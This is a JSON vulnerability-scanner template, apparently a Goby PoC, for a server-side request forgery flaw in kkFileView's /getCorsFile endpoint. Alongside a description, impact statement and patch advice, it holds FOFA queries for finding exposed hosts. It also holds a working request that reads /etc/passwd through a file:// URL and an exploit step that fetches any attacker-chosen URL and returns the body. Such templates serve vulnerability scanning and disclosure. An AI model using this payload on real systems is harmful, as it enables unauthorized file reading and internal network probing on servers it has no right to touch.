{ "Name": "kkFileView SSRF vulnerability", "Description": "

kkFileView is an online preview solution for files and documents, comparable to paid products in the industry such as [Yongzhong office], [office365] and [idocv]. After obtaining the approval of the company's top management, it was open sourced under the Apache license to give back to the community. Special thanks to @Mr. Tang for the support and to @Duanmu Xiangxiao for the contribution. The project is built with the popular Spring Boot, is easy to use and deploy, and basically supports online preview of mainstream office document formats such as doc, docx, Excel, pdf, txt, zip, rar and pictures.

This vulnerability appears in: file-online-preview\\jodconverter-web\\src\\main\\java\\cn\\keking\\web\\controller\\OnlinePreviewController.java

When a file is previewed across domains, the urlPath parameter is user-controllable. Modifying this parameter triggers an SSRF vulnerability that can be used to probe the server's internal network.

", "Product": "kkFileView", "Homepage": "https://github.com/kekingcn/kkFileView", "DisclosureDate": "2020-06-14", "Author": "桂花松糕", "FofaQuery": "body=\"kkfileview.keking.cn\"&&body=\"onlinePreview?url=\"", "GobyQuery": "body=\"kkfileview.keking.cn\"&&body=\"onlinePreview?url=\"", "Level": "2", "Impact": "

When a file is previewed across domains, the urlPath parameter is user-controllable. Modifying this parameter triggers an SSRF vulnerability that can be used to probe the server's internal network (where the file protocol is supported, arbitrary files can be read).

", "Recommendation": "

1. Update to the latest version.

2. Set permissions for cross-domain file previews.

", "References": [ "https://fofa.so/" ], "Is0day": false, "HasExp": true, "ExpParams": [ { "name": "ssrf_cmd", "type": "input", "value": "file:///etc/passwd", "show": "" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/getCorsFile?urlPath=file:///etc/passwd", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "root:x", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/getCorsFile?urlPath={{{ssrf_cmd}}}", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "output|lastbody|regex|(?s)(.*)" ] } ], "Tags": [ "Other" ], "VulType": [ "Other" ], "CVEIDs": [ "" ], "CNNVD": [ "" ], "CNVD": [ "" ], "CVSSScore": "8.6", "Translation": { "CN": { "Name": "kkFileView 服务端请求伪造漏洞", "Product": "kkFileView", "Description": "

kkFileView  此项目为文件文档在线预览项目解决方案,对标业内付费产品有【永中office】【office365】【idocv】等,在取得公司高层同意后以Apache协议开源出来反哺社区,在此特别感谢@唐老大的支持以及@端木详笑的贡献。该项目使用流行的spring boot搭建,易上手和部署,基本支持主流办公文档的在线预览,如doc,docx,Excel,pdf,txt,zip,rar,图片等等。

本次漏洞出现于:file-online-preview\\jodconverter-web\\src\\main\\java\\cn\\keking\\web\\controller\\OnlinePreviewController.java

当通过跨域预览文件的时候,urlPath参数是用户可控的,通过修改此参数,可触发SSRF漏洞,探测服务器内网信息。

", "Recommendation": "

1、 更新至最新版本。

2、 跨域预览文件设置权限。

", "Impact": "

当通过跨域预览文件的时候,urlPath参数是用户可控的,通过修改此参数,可触发SSRF漏洞,探测服务器内网信息(支持file协议的,任意文件读取)。

", "VulType": [ "其他" ], "Tags": [ "其他" ] }, "EN": { "Name": "kkFileView SSRF vulnerability", "Product": "kkFileView", "Description": "

kkFileView is an online preview solution for files and documents, comparable to paid products in the industry such as [Yongzhong office], [office365] and [idocv]. After obtaining the approval of the company's top management, it was open sourced under the Apache license to give back to the community. Special thanks to @Mr. Tang for the support and to @Duanmu Xiangxiao for the contribution. The project is built with the popular Spring Boot, is easy to use and deploy, and basically supports online preview of mainstream office document formats such as doc, docx, Excel, pdf, txt, zip, rar and pictures.

This vulnerability appears in: file-online-preview\\jodconverter-web\\src\\main\\java\\cn\\keking\\web\\controller\\OnlinePreviewController.java

When a file is previewed across domains, the urlPath parameter is user-controllable. Modifying this parameter triggers an SSRF vulnerability that can be used to probe the server's internal network.

", "Recommendation": "

1. Update to the latest version.

2. Set permissions for cross-domain file previews.

", "Impact": "

When a file is previewed across domains, the urlPath parameter is user-controllable. Modifying this parameter triggers an SSRF vulnerability that can be used to probe the server's internal network (where the file protocol is supported, arbitrary files can be read).

", "VulType": [ "Other" ], "Tags": [ "Other" ] } }, "AttackSurfaces": { "Application": null, "Support": null, "Service": null, "System": null, "Hardware": null } }